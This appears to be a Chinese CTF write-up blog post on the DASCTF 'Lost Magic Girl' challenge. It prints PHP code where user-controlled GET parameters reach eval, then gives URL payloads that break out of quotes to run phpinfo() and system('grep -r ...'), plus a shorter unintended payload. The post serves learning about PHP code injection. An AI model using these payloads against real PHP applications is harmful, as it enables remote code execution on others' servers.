

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=auto>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/favicon.jpg">
  <link rel="icon" href="/img/favicon.jpg">
  <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=5.0, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="author" content="John Doe">
  <meta name="keywords" content="">
  
    <meta name="description" content="前言上个暑期末接触CTF，上学期打的比赛报名了连签到都做不出来看见buu上还有题目环境，重新看看，不一样的感觉哎这个比赛misc题占大半，果然是魔法世界 迷路的魔法少女源码直接给出来了分析一下这段代码，学到新的php知识还是蛮多的 123456789101112131415161718192021222324252627282930&lt;?phphighlight_file(&amp;#x27;inde">
<meta property="og:type" content="article">
<meta property="og:title" content="DASCTF Oct X 吉林工师 题目复现">
<meta property="og:url" content="http://gofervor.com/2022/03/27/DASCTFX%E5%90%89%E6%9E%97%E5%B7%A5%E5%B8%88%E5%A4%8D%E7%8E%B0/index.html">
<meta property="og:site_name" content="b1ub1u的小站">
<meta property="og:description" content="前言上个暑期末接触CTF，上学期打的比赛报名了连签到都做不出来看见buu上还有题目环境，重新看看，不一样的感觉哎这个比赛misc题占大半，果然是魔法世界 迷路的魔法少女源码直接给出来了分析一下这段代码，学到新的php知识还是蛮多的 123456789101112131415161718192021222324252627282930&lt;?phphighlight_file(&amp;#x27;inde">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://120.27.243.85:11111/i/2022/03/27/z0osag_0.png">
<meta property="og:image" content="http://120.27.243.85:11111/i/2022/03/27/10o01hk_0.png">
<meta property="article:published_time" content="2022-03-27T13:11:44.000Z">
<meta property="article:modified_time" content="2023-03-02T10:23:54.898Z">
<meta property="article:author" content="John Doe">
<meta name="twitter:card" content="summary_large_image">
<meta name="twitter:image" content="http://120.27.243.85:11111/i/2022/03/27/z0osag_0.png">
  
  
  <title>DASCTF Oct X 吉林工师 题目复现 - b1ub1u的小站</title>

  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4/dist/css/bootstrap.min.css" />


  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/github-markdown-css@4/github-markdown.min.css" />
  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/hint.css@2/hint.min.css" />

  
    
    
      
      <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/highlight.js@10/styles/github-gist.min.css" />
    
  

  
    <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3/dist/jquery.fancybox.min.css" />
  


<!-- 主题依赖的图标库，不要自行修改 -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_ba1fz6golrf.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_lbnruvf0jn.css">


<link  rel="stylesheet" href="/css/main.css" />

<!-- 自定义样式保持在最底部 -->

  
<link rel="stylesheet" href="//cdn.jsdelivr.net/gh/EmoryHuang/BlogBeautify@1.1/shubiao.css">



  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    var CONFIG = {"hostname":"gofervor.com","root":"/","version":"1.8.14","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"right","visible":"hover","icon":""},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"copy_btn":true,"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"baidu":null,"google":null,"gtag":null,"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null,"path":"window.location.pathname","ignore_local":false}},"search_path":"/local-search.xml"};
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
<meta name="generator" content="Hexo 6.0.0"></head>


<body>
  <header style="height: 70vh;">
    <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand" href="/">
      <strong>biubiu~</strong>
    </a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                首页
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                归档
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/">
                <i class="iconfont icon-category-fill"></i>
                分类
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                标签
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                关于
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" href="javascript:;" data-toggle="modal" data-target="#modalSearch" aria-label="Search">
              &nbsp;<i class="iconfont icon-search"></i>&nbsp;
            </a>
          </li>
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self" href="javascript:;" aria-label="Color Toggle">&nbsp;<i
                class="iconfont icon-dark" id="color-toggle-icon"></i>&nbsp;</a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

    <div class="banner" id="banner" parallax=true
         style="background: url('/img/default.jpeg') no-repeat center center;
           background-size: cover;">
      <div class="full-bg-img">
        <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
          <div class="page-header text-center fade-in-up">
            <span class="h2" id="subtitle" title="DASCTF Oct X 吉林工师 题目复现">
              
            </span>

            
              <div class="mt-3">
  
  
    <span class="post-meta">
      <i class="iconfont icon-date-fill" aria-hidden="true"></i>
      <time datetime="2022-03-27 21:11" pubdate>
        2022年3月27日 晚上
      </time>
    </span>
  
</div>

<div class="mt-1">
  
    <span class="post-meta mr-2">
      <i class="iconfont icon-chart"></i>
      2k 字
    </span>
  

  
    <span class="post-meta mr-2">
      <i class="iconfont icon-clock-fill"></i>
      
      
      17 分钟
    </span>
  

  
  
</div>

            
          </div>

          
        </div>
      </div>
    </div>
  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="d-none d-lg-block col-lg-2"></div>
    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div class="py-5" id="board">
          <article class="post-content mx-auto">
            <!-- SEO header -->
            <h1 style="display: none">DASCTF Oct X 吉林工师 题目复现</h1>
            
            <div class="markdown-body">
              <h2 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h2><p>上个暑期末接触CTF，上学期打的比赛报名了连签到都做不出来<br>看见buu上还有题目环境，重新看看，不一样的感觉哎<br>这个比赛misc题占大半，果然是魔法世界</p>
<h2 id="迷路的魔法少女"><a href="#迷路的魔法少女" class="headerlink" title="迷路的魔法少女"></a>迷路的魔法少女</h2><p>源码直接给出来了<br><img src="http://120.27.243.85:11111/i/2022/03/27/z0osag_0.png" srcset="/img/loading.gif" lazyload><br>分析一下这段代码，学到新的php知识还是蛮多的</p>
<figure class="highlight php"><table><tr><td class="gutter"><div class="code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br></pre></div></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br><span class="hljs-title function_ invoke__">highlight_file</span>(<span class="hljs-string">&#x27;index.php&#x27;</span>);<br><br><span class="hljs-title function_ invoke__">extract</span>(<span class="hljs-variable">$_GET</span>);         <span class="hljs-comment">//把以GET方式传入的参数自动转换为正常的变量，可以直接调用变量，extract($_GET)的数值为传入参数的个数</span><br><span class="hljs-title function_ invoke__">error_reporting</span>(<span class="hljs-number">0</span>);<br><span class="hljs-function"><span class="hljs-keyword">function</span> <span class="hljs-title">String2Array</span>(<span class="hljs-params"><span class="hljs-variable">$data</span></span>)            //漏洞函数</span><br><span class="hljs-function"></span>&#123;<br>    <span class="hljs-keyword">if</span>(<span class="hljs-variable">$data</span> == <span class="hljs-string">&#x27;&#x27;</span>) <span class="hljs-keyword">return</span> <span class="hljs-keyword">array</span>();<br>    @<span class="hljs-keyword">eval</span>(<span class="hljs-string">&quot;\$array = <span class="hljs-subst">$data</span>;&quot;</span>);          <span class="hljs-comment">//执行点: eval，\$符号是shell脚本中的特殊符号，可以将 $array 数组类型数据执行</span><br>    <span class="hljs-keyword">return</span> <span class="hljs-variable">$array</span>;<br>&#125;<br><br><br><span class="hljs-keyword">if</span>(<span class="hljs-title function_ invoke__">is_array</span>(<span class="hljs-variable">$attrid</span>) &amp;&amp; <span class="hljs-title function_ invoke__">is_array</span>(<span class="hljs-variable">$attrvalue</span>))<br>&#123;<br>        <span class="hljs-variable">$attrstr</span> .= <span class="hljs-string">&#x27;array(&#x27;</span>;           <span class="hljs-comment">//PHP中.=是在原有变量基础上加，而不是重新赋值。比如 `$a.=&quot;a&quot;;$a.=&quot;b&quot;;echo $a;` 将输出ab</span><br>        <span class="hljs-variable">$attrids</span> = <span class="hljs-title function_ invoke__">count</span>(<span class="hljs-variable">$attrid</span>);      <span class="hljs-comment">//count函数，返回数组中的元素长度</span><br>        <span class="hljs-keyword">for</span>(<span class="hljs-variable">$i</span>=<span class="hljs-number">0</span>; <span class="hljs-variable">$i</span>&lt;<span class="hljs-variable">$attrids</span>; <span class="hljs-variable">$i</span>++)<br>        &#123;<br>            <span class="hljs-variable">$attrstr</span> .= <span class="hljs-string">&#x27;&quot;&#x27;</span>.<span class="hljs-title function_ invoke__">intval</span>(<span class="hljs-variable">$attrid</span>[<span class="hljs-variable">$i</span>]).<span class="hljs-string">&#x27;&quot;=&gt;&#x27;</span>.<span class="hljs-string">&#x27;&quot;&#x27;</span>.<span class="hljs-variable">$attrvalue</span>[<span class="hljs-variable">$i</span>].<span class="hljs-string">&#x27;&quot;&#x27;</span>;       <span class="hljs-comment">//intval返回整数值</span><br>            <span class="hljs-keyword">if</span>(<span class="hljs-variable">$i</span> &lt; <span class="hljs-variable">$attrids</span>-<span class="hljs-number">1</span>)<br>            &#123;<br>                <span class="hljs-variable">$attrstr</span> .= <span class="hljs-string">&#x27;,&#x27;</span>;<br>            &#125;<br>        &#125;<br>        <span class="hljs-variable">$attrstr</span> .= <span class="hljs-string">&#x27;);&#x27;</span>;<br>&#125;<br><br><span class="hljs-title function_ invoke__">String2Array</span>(<span class="hljs-variable">$attrstr</span>);<br><br></code></pre></td></tr></table></figure>
<p>所以解题的关键在于构造出一个$attrid和$attrvalue使最终的$attrstr是完整的数组类型数据<br>从而成功调用String2Array这个漏洞函数</p>
<p>先假想传个参?attrid[]&#x3D;1&amp;attrvalue[]&#x3D;a<br>放入第二段代码，得出的$attrstr应该为’arrar(“1”&#x3D;&gt;”a”);’</p>
<p>如果想进行命令执行比如phpinfo，传入attrid[]&#x3D;1&amp;attrvalue[]&#x3D;phpinfo()是不行的<br>这点我不太确定，因为用php在线执行网站可以，自己搭的环境不行<br>没太搞懂，个人理解可能是得出的$attrstr为’arrar(“1”&#x3D;&gt;”phpinfo()”);’中的phpinfo是带双引号的，不能被执行</p>
<p>所以要绕过这个双引号就要像sql注入一样前后各闭合去注入<br>payload: <code>?attrid[]=1&amp;attrvalue[]=1&quot;,&quot;2&quot;=&gt;phpinfo(),&quot;3&quot;=&gt;&quot;1</code><br>此时得到的$attrsr为 array(“1”&#x3D;&gt;”1”,”2”&#x3D;&gt;phpinfo(),”3”&#x3D;&gt;”1”); 是可行的<br>flag可以在phpinfo里搜到</p>
<p>想通过sysytem这种函数 ls找目录+cat查内容 在这题找不到，因为flag不在html或者根目录<br>不过可以用system+grep递归搜索字符串<code>flag&#123;</code><br>payload: <code>?attrid[]=1&amp;attrvalue[]=1&quot;,&quot;2&quot;=&gt;system(&#39;grep -r &quot;flag&#123;&quot; /&#39;),&quot;3&quot;=&gt;&quot;1</code><br><img src="http://120.27.243.85:11111/i/2022/03/27/10o01hk_0.png" srcset="/img/loading.gif" lazyload></p>
<p>ps：上网找资料的时候发现这个string2array漏洞是两年前cms上比较火的漏洞，主要是没有考虑用户是否能控制这个字符串，<br>    被eval将字符串以代码执行形成漏洞</p>
<p>——-3月29日更———<br>震惊，发现一位大佬的非预期解<br>payload：<code>?attrstr=phpinfo();</code><br>原理是开头的<code>extract($_GET);</code>能将传入的参数自动转换为变量，直接跳过第二部分执行<code>String2Array($attrstr);</code><br>秒~~~~~~~~~~~~~~啊!</p>

            </div>
            <hr>
            <div>
              <div class="post-metas mb-3">
                
                
              </div>
              
                <p class="note note-warning">
                  
                    本博客所有文章除特别声明外，均采用 <a target="_blank" href="https://creativecommons.org/licenses/by-sa/4.0/deed.zh" rel="nofollow noopener noopener">CC BY-SA 4.0 协议</a> ，转载请注明出处！
                  
                </p>
              
              
                <div class="post-prevnext">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2022/03/29/DASCTF%20Sept%20X%20%E6%B5%99%E6%B1%9F%E5%B7%A5%E4%B8%9A%E5%A4%A7%E5%AD%A6%20%E9%A2%98%E7%9B%AE%E5%A4%8D%E7%8E%B0/">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">DASCTF Sept X 浙江工业大学 题目复现</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2022/03/25/ctfshow%E5%8D%B7%E7%8E%8B%E6%9D%AF-Web/">
                        <span class="hidden-mobile">ctfshow卷王杯-Web</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>
    
      <div class="d-none d-lg-block col-lg-2 toc-container" id="toc-ctn">
        <div id="toc">
  <p class="toc-header"><i class="iconfont icon-list"></i>&nbsp;目录</p>
  <div class="toc-body" id="toc-body"></div>
</div>

      </div>
    
  </div>
</div>

<!-- Custom -->


    

    
      <a id="scroll-top-button" aria-label="TOP" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v"
                 for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>
    

    
  </main>

  <footer class="text-center mt-5 py-3">
  <div class="footer-content">
     <div> <span id="timeDate">载入天数...</span> <span id="times">载入时分秒...</span> <script src="/js/duration.js"></script> </div> <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>hexo</span></a> <i class="iconfont icon-love"></i> <a href="http://www.gofervor.com/" target="_blank" rel="nofollow noopener"><span>b1ub1u</span></a> 
  </div>
  

  
  <!-- 备案信息 -->
  <div class="beian">
    <span>
      <a href="http://beian.miit.gov.cn/" target="_blank" rel="nofollow noopener">
        皖ICP备2021017950号
      </a>
    </span>
    
  </div>


  
</footer>


  <!-- SCRIPTS -->
  
  <script  src="https://cdn.jsdelivr.net/npm/nprogress@0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/nprogress@0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://cdn.jsdelivr.net/npm/jquery@3/dist/jquery.min.js" ></script>
<script  src="https://cdn.jsdelivr.net/npm/bootstrap@4/dist/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>

<!-- Plugins -->


  <script  src="/js/local-search.js" ></script>



  
    <script  src="/js/img-lazyload.js" ></script>
  



  



  
    <script  src="https://cdn.jsdelivr.net/npm/tocbot@4/dist/tocbot.min.js" ></script>
  
  
    <script  src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3/dist/jquery.fancybox.min.js" ></script>
  
  
    <script  src="https://cdn.jsdelivr.net/npm/anchor-js@4/anchor.min.js" ></script>
  
  
    <script defer src="https://cdn.jsdelivr.net/npm/clipboard@2/dist/clipboard.min.js" ></script>
  






  <script  src="https://cdn.jsdelivr.net/npm/typed.js@2/lib/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var title = document.getElementById('subtitle').title;
      
        typing(title);
      
    })(window, document);
  </script>














  
<script src="//cdn.jsdelivr.net/gh/EmoryHuang/BlogBeautify@1.1/DynamicRibbon.min.js"></script>
<script src="//cdn.jsdelivr.net/gh/EmoryHuang/BlogBeautify@1.1/DynamicLine.min.js"></script>
<script src="//cdn.jsdelivr.net/gh/EmoryHuang/BlogBeautify@1.1/snowflake.min.js"></script>
<script src="//cdn.jsdelivr.net/gh/EmoryHuang/BlogBeautify@1.1/containsWord.min.js"></script>



<!-- 主题的启动项 保持在最底部 -->
<script  src="/js/boot.js" ></script>


<script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"pluginRootPath":"live2dw/","pluginJsPath":"lib/","pluginModelPath":"assets/","tagMode":false,"debug":false,"model":{"jsonPath":"/live2dw/assets/nico.model.json"},"display":{"position":"right","width":300,"height":600},"mobile":{"show":true},"react":{"opacity":0.7},"log":false});</script></body>
</html>
